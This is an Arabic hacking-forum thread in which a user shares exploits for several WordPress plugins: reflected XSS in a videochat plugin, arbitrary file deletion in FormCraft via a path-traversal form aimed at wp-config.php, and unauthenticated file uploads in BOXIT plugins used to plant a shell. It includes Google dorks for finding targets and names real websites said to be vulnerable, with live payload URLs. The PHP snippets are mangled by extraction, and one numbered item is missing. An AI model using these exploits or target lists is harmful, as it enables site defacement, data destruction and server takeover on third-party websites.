1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : ViRuS TER0N | المشاهدات : 401 | الردود : 1
  1. ViRuS TER0N

    ViRuS TER0N DeveloPer Plus

    الأنتساب:
    ‏28 مارس 2012
    المشاركات:
    115
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    الجزائر
    [​IMG]

    السلام عليكم ورحمة الله وبركاته

    كيف الحال ان شاء الله بخير


    بعض ثغرات الووردبرس من آكتشاف NULL Pointer حبيت اطرحها للفائده

    1 - Wordpress Plugin Webcam 2Way Videochat XSS Vulnerability

    Google Dork :

    كود PHP:
    inurl:"/wp-content/plugins/webcam-2way-videochat/"


    الثغرة في الملف webcam-2way-videochat.php في السطر 609 :

    كود PHP:
    default:echo $_GET['task'] . '&ajax=';


    الإستغلال :

    كود PHP:
    http://127.0.0.1/wp-admin/admin-ajax.php?action=v2wvc&task=/*XSS_HERE*/


    بعض المواقع المصابة :

    http://bogovete.com/wp-admin/admin-ajax.php?action=v2wvc&task=<script>alert(/NULL_Pointer/)</script>
    https://pikaritas.com/wp-admin/admi...c&task=<script>alert(/NULL_Pointer/)</script>
    http://zhangzining.net/wordpress/wp...c&task=<script>alert(/NULL_Pointer/)</script>
    http://www.videochat-scripts.com/wp...c&task=<script>alert(/NULL_Pointer/)</script>

    2 - Wordpress Plugin FormCraft Premium Arbitrary File Deletion Vulnerability

    لحذف أي ملف من السيرفر

    Google Dork :

    كود PHP:
    inurl:"/wp-content/plugins/formcraft/"
    الثغرة في الملف function.php في السطر 512 :

    كود PHP:
        if (isset($_POST['name']))
        {
            
    $file_name get_home_path().'wp-content/plugins/formcraft/file-upload/server/php/files/'.$_POST['name'];
            if (
    is_file($file_name))
            {
                
    unlink($file_name);
                echo 
    "Deleted";
            }
            else
            {
                echo 
    "Not";
            }
        } 
    الإستغلال :

    مثال لحذف ملف الكونفيق wp-config.php

    كود PHP:
    <!--
    By NULL_Pointer
    -->
    <
    form action="http://127.0.0.1/wp-admin/admin-ajax.php?action=formcraft_delete_file" method="POST">
    <
    input name="name" value="../../../../../../../wp-config.php">
    <
    input type="submit" value="Delete It">
    </
    form>
    الثغرة في الملف upload.php

    الإستغلال :

    كود PHP:
    <!--
    By NULL_Pointer
    -->
    <
    form action="http://127.0.0.1/wp-content/plugins/boxit-2/upload.php" method="POST" enctype="multipart/form-data">
    <
    input type="file" name="qqfile">
    <
    input type="submit" value="Upload">
    </
    form>
    لإستعراض الشل، نروح للمسار هذا

    http://127.0.0.1/wp-content/plugins/boxit-2/tmp/

    بعض المواقع المصابة :

    Print Bureau - Digital and Lithographic Printing In Hebden Bridge | Sowerby Bridge | Halifax | West Yorkshire
    Freisteller - gأ¼nstig Bilder freistellen lassen - picperfect,de

    4 - WordPress Plugin BOXIT File Upload Vulnerability

    الثغرة في الملف boxit.php عند الدالة boxit_uploader_process في السطر 549.

    الإستغلال :

    كود PHP:
    <!--
    By NULL_Pointer
    -->
    <
    form action="http://127.0.0.1/wp-admin/admin-ajax.php?action=wpud_uploader_process" method="POST" enctype="multipart/form-data">
    <
    input type="file" name="files">
    <
    input type="submit" value="Upload">
    </
    form>
    http://127.0.0.1/wp-content/plugins/boxit/tmp/

    بعض المواقع المصابة :

    Center for Chemistry Education | Miami University

    وهذه روابط لتحميل الPlugins لمن أراد فحصها أكثر :

    Webcam 2 Way Videochat 4.41
    Webcam 2 Way Videochat 4.41

    FormCraft 2.0.5
    FormCraft 2.0.5

    BOXIT 2.0.2
    BOXIT 2.0.2

    BOXIT
    BOXIT

    بالتوفيق للجميع والسلام عليكم ورحمة الله وبركاته
     
  2. сомαиdα

    сомαиdα Developer

    الأنتساب:
    ‏29 مارس 2012
    المشاركات:
    51
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    in the holy Land
    نظام التشغيل:
    Linux
    رد: بعض ثغرات الووردبرس - Wordpress

    وعليكم السلام

    يعطيك العافية

    مجهود رائع
     

مشاركة هذه الصفحة